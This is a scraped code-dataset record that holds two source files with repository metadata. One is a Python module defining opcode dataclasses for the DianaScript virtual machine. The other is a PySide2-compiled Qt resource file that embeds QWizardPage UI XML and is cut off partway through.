[
"BSD-3-Clause"
] | 1
|
2021-11-10T12:36:45.000Z
|
2021-11-10T12:36:45.000Z
|
dianascript/code_cons.py
|
thautwarm/DianaVM
|
be13363e4137c919df15601366d91ab69361dd18
|
[
"BSD-3-Clause"
] | null | null | null |
dianascript/code_cons.py
|
thautwarm/DianaVM
|
be13363e4137c919df15601366d91ab69361dd18
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import annotations
from dataclasses import dataclass
from pyrsistent import PVector
from dianascript.serialize import DObj, Builder, InternString, serialize_
from typing import TypeVar, Generic, TYPE_CHECKING
import struct
_T = TypeVar("_T")
if TYPE_CHECKING:
Bytecode = PVector[int | InternString]
BytecodeBuilder = list[int | InternString]
@dataclass(frozen=True)
class Diana_FunctionDef:
metadataInd: int
TAG = 0
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.metadataInd)
@dataclass(frozen=True)
class Diana_LoadGlobalRef:
istr: InternString
TAG = 1
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.istr)
@dataclass(frozen=True)
class Diana_DelVar:
target: int
TAG = 2
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.target)
@dataclass(frozen=True)
class Diana_LoadVar:
i: int
TAG = 3
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.i)
@dataclass(frozen=True)
class Diana_StoreVar:
i: int
TAG = 4
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.i)
@dataclass(frozen=True)
class Diana_Action:
kind: int
TAG = 5
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.kind)
@dataclass(frozen=True)
class Diana_Return:
TAG = 6
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_Break:
TAG = 7
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_Continue:
TAG = 8
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_JumpIfNot:
off: int
TAG = 9
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.off)
@dataclass(frozen=True)
class Diana_JumpIfNot_OrPop:
off: int
TAG = 10
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.off)
@dataclass(frozen=True)
class Diana_JumpIf:
off: int
TAG = 11
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.off)
@dataclass(frozen=True)
class Diana_JumpIf_OrPop:
off: int
TAG = 12
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.off)
@dataclass(frozen=True)
class Diana_Jump:
off: int
TAG = 13
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.off)
@dataclass(frozen=True)
class Diana_GetAttr:
attr: InternString
TAG = 14
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr:
attr: InternString
TAG = 15
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Iadd:
attr: InternString
TAG = 16
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Isub:
attr: InternString
TAG = 17
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Imul:
attr: InternString
TAG = 18
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Itruediv:
attr: InternString
TAG = 19
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Ifloordiv:
attr: InternString
TAG = 20
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Imod:
attr: InternString
TAG = 21
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Ipow:
attr: InternString
TAG = 22
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Ilshift:
attr: InternString
TAG = 23
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Irshift:
attr: InternString
TAG = 24
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Ibitor:
attr: InternString
TAG = 25
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Ibitand:
attr: InternString
TAG = 26
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_SetAttr_Ibitxor:
attr: InternString
TAG = 27
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.attr)
@dataclass(frozen=True)
class Diana_DelItem:
TAG = 28
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_GetItem:
TAG = 29
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem:
TAG = 30
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Iadd:
TAG = 31
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Isub:
TAG = 32
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Imul:
TAG = 33
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Itruediv:
TAG = 34
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Ifloordiv:
TAG = 35
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Imod:
TAG = 36
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Ipow:
TAG = 37
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Ilshift:
TAG = 38
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Irshift:
TAG = 39
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Ibitor:
TAG = 40
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Ibitand:
TAG = 41
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_SetItem_Ibitxor:
TAG = 42
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_add:
TAG = 43
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_sub:
TAG = 44
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_mul:
TAG = 45
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_truediv:
TAG = 46
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_floordiv:
TAG = 47
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_mod:
TAG = 48
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_pow:
TAG = 49
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_lshift:
TAG = 50
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_rshift:
TAG = 51
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_bitor:
TAG = 52
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_bitand:
TAG = 53
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_bitxor:
TAG = 54
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_gt:
TAG = 55
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_lt:
TAG = 56
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_ge:
TAG = 57
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_le:
TAG = 58
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_eq:
TAG = 59
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_ne:
TAG = 60
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_in:
TAG = 61
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_notin:
TAG = 62
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_UnaryOp_invert:
TAG = 63
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_UnaryOp_not:
TAG = 64
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_UnaryOp_neg:
TAG = 65
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_MKDict:
n: int
TAG = 66
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.n)
@dataclass(frozen=True)
class Diana_MKSet:
n: int
TAG = 67
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.n)
@dataclass(frozen=True)
class Diana_MKList:
n: int
TAG = 68
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.n)
@dataclass(frozen=True)
class Diana_Call:
n: int
TAG = 69
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.n)
@dataclass(frozen=True)
class Diana_Format:
format: int
argn: int
TAG = 70
OFFSET = 3
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.format)
flat_code.append(self.argn)
@dataclass(frozen=True)
class Diana_Const:
p_const: int
TAG = 71
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.p_const)
@dataclass(frozen=True)
class Diana_MKTuple:
n: int
TAG = 72
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.n)
@dataclass(frozen=True)
class Diana_Pack:
n: int
TAG = 73
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.n)
@dataclass(frozen=True)
class Diana_Replicate:
n: int
TAG = 74
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.n)
@dataclass(frozen=True)
class Diana_Pop:
TAG = 75
OFFSET = 1
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
@dataclass(frozen=True)
class Diana_TryCatch:
unwind_bound: int
catch_start: int
catch_bound: int
TAG = 76
OFFSET = 4
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.unwind_bound)
flat_code.append(self.catch_start)
flat_code.append(self.catch_bound)
@dataclass(frozen=True)
class Diana_TryFinally:
unwind_bound: int
final_start: int
final_bound: int
TAG = 77
OFFSET = 4
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.unwind_bound)
flat_code.append(self.final_start)
flat_code.append(self.final_bound)
@dataclass(frozen=True)
class Diana_TryCatchFinally:
unwind_bound: int
catch_start: int
catch_bound: int
final_start: int
final_bound: int
TAG = 78
OFFSET = 6
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.unwind_bound)
flat_code.append(self.catch_start)
flat_code.append(self.catch_bound)
flat_code.append(self.final_start)
flat_code.append(self.final_bound)
@dataclass(frozen=True)
class Diana_Loop:
loop_bound: int
TAG = 79
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.loop_bound)
@dataclass(frozen=True)
class Diana_For:
loop_bound: int
TAG = 80
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.loop_bound)
@dataclass(frozen=True)
class Diana_With:
with_bound: int
TAG = 81
OFFSET = 2
def dumps(self, flat_code: BytecodeBuilder):
flat_code.append(self.TAG)
flat_code.append(self.with_bound)
@dataclass(frozen=True)
class FuncMeta:
is_vararg: bool
freeslots: PVector[int]
nonargcells: PVector[int]
narg: int
nlocal: int
name: InternString
filename: str
lineno: int
linenos: PVector[tuple[int, int]]
freenames: PVector[str]
localnames: PVector[str]
bytecode: Bytecode
def serialize_(self, barr: bytearray):
serialize_(self.is_vararg, barr)
serialize_(self.freeslots, barr)
serialize_(self.nonargcells, barr)
serialize_(self.narg, barr)
serialize_(self.nlocal, barr)
serialize_(self.name, barr)
serialize_(self.filename, barr)
serialize_(self.lineno, barr)
serialize_(self.linenos, barr)
serialize_(self.freenames, barr)
serialize_(self.localnames, barr)
serialize_(self.bytecode, barr)
def as_flatten(self) -> int:
return Storage.funcmetas.cache(self)
def as_flatten(self):
if isinstance(self, int):
return self
return self.as_flatten()
class Storage:
strings : Builder[str] = Builder()
internstrings : Builder[InternString] = Builder()
dobjs : Builder[DObj] = Builder()
funcmetas : Builder[FuncMeta] = Builder()
@classmethod
def serialize_(cls, barr: bytearray):
cls.strings.serialize_(barr)
cls.internstrings.serialize_(barr)
cls.dobjs.serialize_(barr)
cls.funcmetas.serialize_(barr)
class PlaceHolder:
def __init__(self, OFFSET: int):
self.OFFSET = OFFSET
Instr = (
PlaceHolder
| Diana_FunctionDef
| Diana_LoadGlobalRef
| Diana_DelVar
| Diana_LoadVar
| Diana_StoreVar
| Diana_Action
| Diana_Return
| Diana_Break
| Diana_Continue
| Diana_JumpIfNot
| Diana_JumpIfNot_OrPop
| Diana_JumpIf
| Diana_JumpIf_OrPop
| Diana_Jump
| Diana_GetAttr
| Diana_SetAttr
| Diana_SetAttr_Iadd
| Diana_SetAttr_Isub
| Diana_SetAttr_Imul
| Diana_SetAttr_Itruediv
| Diana_SetAttr_Ifloordiv
| Diana_SetAttr_Imod
| Diana_SetAttr_Ipow
| Diana_SetAttr_Ilshift
| Diana_SetAttr_Irshift
| Diana_SetAttr_Ibitor
| Diana_SetAttr_Ibitand
| Diana_SetAttr_Ibitxor
| Diana_DelItem
| Diana_GetItem
| Diana_SetItem
| Diana_SetItem_Iadd
| Diana_SetItem_Isub
| Diana_SetItem_Imul
| Diana_SetItem_Itruediv
| Diana_SetItem_Ifloordiv
| Diana_SetItem_Imod
| Diana_SetItem_Ipow
| Diana_SetItem_Ilshift
| Diana_SetItem_Irshift
| Diana_SetItem_Ibitor
| Diana_SetItem_Ibitand
| Diana_SetItem_Ibitxor
| Diana_add
| Diana_sub
| Diana_mul
| Diana_truediv
| Diana_floordiv
| Diana_mod
| Diana_pow
| Diana_lshift
| Diana_rshift
| Diana_bitor
| Diana_bitand
| Diana_bitxor
| Diana_gt
| Diana_lt
| Diana_ge
| Diana_le
| Diana_eq
| Diana_ne
| Diana_in
| Diana_notin
| Diana_UnaryOp_invert
| Diana_UnaryOp_not
| Diana_UnaryOp_neg
| Diana_MKDict
| Diana_MKSet
| Diana_MKList
| Diana_Call
| Diana_Format
| Diana_Const
| Diana_MKTuple
| Diana_Pack
| Diana_Replicate
| Diana_Pop
| Diana_TryCatch
| Diana_TryFinally
| Diana_TryCatchFinally
| Diana_Loop
| Diana_For
| Diana_With
)
TypeIndex = [
Diana_FunctionDef,
Diana_LoadGlobalRef,
Diana_DelVar,
Diana_LoadVar,
Diana_StoreVar,
Diana_Action,
Diana_Return,
Diana_Break,
Diana_Continue,
Diana_JumpIfNot,
Diana_JumpIfNot_OrPop,
Diana_JumpIf,
Diana_JumpIf_OrPop,
Diana_Jump,
Diana_GetAttr,
Diana_SetAttr,
Diana_SetAttr_Iadd,
Diana_SetAttr_Isub,
Diana_SetAttr_Imul,
Diana_SetAttr_Itruediv,
Diana_SetAttr_Ifloordiv,
Diana_SetAttr_Imod,
Diana_SetAttr_Ipow,
Diana_SetAttr_Ilshift,
Diana_SetAttr_Irshift,
Diana_SetAttr_Ibitor,
Diana_SetAttr_Ibitand,
Diana_SetAttr_Ibitxor,
Diana_DelItem,
Diana_GetItem,
Diana_SetItem,
Diana_SetItem_Iadd,
Diana_SetItem_Isub,
Diana_SetItem_Imul,
Diana_SetItem_Itruediv,
Diana_SetItem_Ifloordiv,
Diana_SetItem_Imod,
Diana_SetItem_Ipow,
Diana_SetItem_Ilshift,
Diana_SetItem_Irshift,
Diana_SetItem_Ibitor,
Diana_SetItem_Ibitand,
Diana_SetItem_Ibitxor,
Diana_add,
Diana_sub,
Diana_mul,
Diana_truediv,
Diana_floordiv,
Diana_mod,
Diana_pow,
Diana_lshift,
Diana_rshift,
Diana_bitor,
Diana_bitand,
Diana_bitxor,
Diana_gt,
Diana_lt,
Diana_ge,
Diana_le,
Diana_eq,
Diana_ne,
Diana_in,
Diana_notin,
Diana_UnaryOp_invert,
Diana_UnaryOp_not,
Diana_UnaryOp_neg,
Diana_MKDict,
Diana_MKSet,
Diana_MKList,
Diana_Call,
Diana_Format,
Diana_Const,
Diana_MKTuple,
Diana_Pack,
Diana_Replicate,
Diana_Pop,
Diana_TryCatch,
Diana_TryFinally,
Diana_TryCatchFinally,
Diana_Loop,
Diana_For,
Diana_With,
]
| 23.06338
| 74
| 0.626041
| 2,721
| 22,925
| 5.049614
| 0.0871
| 0.124017
| 0.133479
| 0.171616
| 0.813028
| 0.796143
| 0.792722
| 0.792722
| 0.792722
| 0.782096
| 0
| 0.014518
| 0.290905
| 22,925
| 994
| 75
| 23.06338
| 0.830709
| 0
| 0
| 0.501225
| 0
| 0
| 0.000091
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.106618
| false
| 0
| 0.007353
| 0.001225
| 0.502451
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
6128eccd39b2beb0700ee36e7f13d745e86b95fa
| 16,354
|
py
|
Python
|
questions/57185927/57185927-2/resource_rc.py
|
LoicGRENON/stackoverflow
|
e555b9dbb479ba2f36cd51dea373e1cfafffa6b1
|
[
"MIT"
] | 302
|
2017-03-04T00:05:23.000Z
|
2022-03-28T22:51:29.000Z
|
questions/57185927/57185927-2/resource_rc.py
|
JohnDavidAnthony/stackoverflow
|
9fb130501cd546b524024c98b6bc8e8a2d8df035
|
[
"MIT"
] | 30
|
2017-12-02T19:26:43.000Z
|
2022-03-28T07:40:36.000Z
|
questions/57185927/57185927-2/resource_rc.py
|
JohnDavidAnthony/stackoverflow
|
9fb130501cd546b524024c98b6bc8e8a2d8df035
|
[
"MIT"
] | 388
|
2017-07-04T16:53:12.000Z
|
2022-03-18T22:20:19.000Z
|
# -*- coding: utf-8 -*-
# Resource object code
#
# Created: Wed Jul 24 11:39:18 2019
# by: The Resource Compiler for PySide2 (Qt v5.13.0)
#
# WARNING! All changes made in this file will be lost!
from PySide2 import QtCore
qt_resource_data = b"\
\x00\x00\x02i\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>15</strin\
g>\x0a </proper\
ty>\x0a </widget\
>\x0a </item>\x0a <\
/layout>\x0a </widg\
et>\x0a <resources/\
>\x0a <connections/\
>\x0a</ui>\x0a\
\x00\x00\x02i\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>13</strin\
g>\x0a </proper\
ty>\x0a </widget\
>\x0a </item>\x0a <\
/layout>\x0a </widg\
et>\x0a <resources/\
>\x0a <connections/\
>\x0a</ui>\x0a\
\x00\x00\x02i\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>11</strin\
g>\x0a </proper\
ty>\x0a </widget\
>\x0a </item>\x0a <\
/layout>\x0a </widg\
et>\x0a <resources/\
>\x0a <connections/\
>\x0a</ui>\x0a\
\x00\x00\x02h\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>5</string\
>\x0a </propert\
y>\x0a </widget>\
\x0a </item>\x0a </\
layout>\x0a </widge\
t>\x0a <resources/>\
\x0a <connections/>\
\x0a</ui>\x0a\
\x00\x00\x02h\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>2</string\
>\x0a </propert\
y>\x0a </widget>\
\x0a </item>\x0a </\
layout>\x0a </widge\
t>\x0a <resources/>\
\x0a <connections/>\
\x0a</ui>\x0a\
\x00\x00\x02i\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>10</strin\
g>\x0a </proper\
ty>\x0a </widget\
>\x0a </item>\x0a <\
/layout>\x0a </widg\
et>\x0a <resources/\
>\x0a <connections/\
>\x0a</ui>\x0a\
\x00\x00\x02h\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>3</string\
>\x0a </propert\
y>\x0a </widget>\
\x0a </item>\x0a </\
layout>\x0a </widge\
t>\x0a <resources/>\
\x0a <connections/>\
\x0a</ui>\x0a\
\x00\x00\x02h\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
